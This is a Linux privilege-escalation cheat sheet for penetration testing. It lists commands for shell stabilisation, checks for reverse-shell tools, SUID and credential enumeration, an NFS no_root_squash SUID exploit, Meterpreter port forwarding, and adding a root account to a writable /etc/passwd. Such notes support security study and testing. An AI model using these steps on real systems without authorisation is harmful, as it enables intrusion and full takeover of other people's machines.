S1REN's linux privesc
Linux Privilege Escalation Mindmap
1. Initial Shell Stabilization

- Spawn a proper TTY:
    python -c 'import pty; pty.spawn("/bin/bash")'
    python3 -c 'import pty; pty.spawn("/bin/bash")'

- Environment setup:
    export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
    export TERM=xterm-256color
    alias ll='ls -lsaht --color=auto'

- Background / foreground manipulation:
    Ctrl + Z → background the process
    stty raw -echo ; fg ; reset

- Terminal resize:
    stty columns 200 rows 200
2. Capabilities / Tools Check

- Compilers & interpreters:
    which gcc
    which cc
    which python
    which perl

- Download / transfer tools:
    which wget
    which curl
    which fetch    (BSD)

- Networking / reverse shells:
    which nc
    which ncat
    which nc.traditional
    which socat
3. System Information Gathering

- Binary inspection:
    file /bin/bash

- Kernel info:
    uname -a

- Distribution / release info:
    cat /etc/issue
    cat /etc/*-release

- User privileges:
    sudo -l
    ls -lsaht /etc/sudoers

- User group memberships:
    groups <user>

- Environment variables:
    env

- Reference guides:
    Path variable exploitation: link
4. Filesystem Enumeration

- Home directories:
    cd /home/ → ls -lsaht

- Web configuration files:
    cd /var/www/html/ → ls -lsaht

- SUID binaries:
    find / -perm -u=s -type f 2>/dev/null

- SGID binaries:
    find / -perm -g=s -type f 2>/dev/null

- SUID/SGID/SUDO escalation reference:

- Binary/language capabilities:
    getcap -r / 2>/dev/null
    Reference: getcap / setcap guide

- Writable directories to "live" in:
    /var/tmp/, /tmp/, /dev/shm/

- Exotic filesystem mounts / extended attributes:
    cat /etc/fstab
5. Monitoring & Persistence

- Monitoring cron / processes:
    pspy32 / pspy64
    Steps:
        cd /var/tmp/
        Transfer pspy32/pspy64 to the target
        chmod 755 pspy*
        ./pspy*
    GitHub: pspy

- Network inspection:
    netstat -antup
    netstat -tunlp
    netstat -an -p tcp    (for FreeBSD)

- Processes running as root:
    ps aux | grep -i 'root' --color=auto
6. Credential / Config Discovery

- MySQL access (root, unauthorized):
    mysql -uroot -p
    Default credentials tried: root, toor, blank

- /etc inspection:
    cd /etc/ → ls -lsaht
    Config files:
        ls -lsaht | grep -i '.conf' --color=auto
    Secret files:
        ls -lsaht | grep -i '.secret' --color=auto

- SSH keys:
    ls -lsaR /home/

- Other locations:
    /var/lib/ → ls -lsaht
    /var/db/ → ls -lsaht
    /opt/ → ls -lsaht
    /tmp/ → ls -lsaht
    /var/tmp/ → ls -lsaht
    /dev/shm/ → ls -lsaht
7. File Transfer Capability

- Tools check:
    which wget, which curl, which nc, which fetch
    ls -lsaht /bin/ | grep -i 'ftp' --color=auto

- NFS exploitation:
    cat /etc/exports → check for no_root_squash
    Attacking machine:
        mkdir -p /mnt/nfs/
        mount -t nfs -o vers=<1,2,3> $IP:<share> /mnt/nfs/ -nolock
        Compile SUID:
            gcc suid.c -o suid
            cp suid /mnt/nfs/
            chmod u+s /mnt/nfs/suid
            su <user> → execute /mnt/nfs/suid
    Target machine:
        ./suid → root
8. Privilege Escalation Techniques

- Exotic FS / extended attributes:
    cat /etc/fstab

- GTFOBins / capabilities / SUID:
    Use GTFOBins for binaries with EP or empty capabilities

- Forwarding weak services (Meterpreter example):
    Check for vulnerable loopback services (e.g., Samba SMBD)
    Port forwarding:
        meterpreter> portfwd add -l 139 -p 139 -r <target>
        Background & exploit locally

- Direct /etc/passwd modification (if writable):
    openssl passwd -1 'i<3hacking' → $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
    echo 'siren:<hash>:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
    su siren → id
9. Cron Jobs / Scheduled Tasks

- User cron:
    crontab -u root -l

- System-wide cron:
    cat /etc/crontab
    ls /etc/cron.*

- Monitor suspicious scripts for privilege escalation
10. User / File Enumeration

- Find files owned by a user (e.g. bob):
    find / -user bob 2>/dev/null

- Mail files:
    /var/mail/
    /var/spool/mail/
11. Automation / Enumeration Tools

- linPEAS: GitHub link
- Traitor: GitHub link
- GTFOBins: Website link
- PSpy32 / PSpy64: GitHub link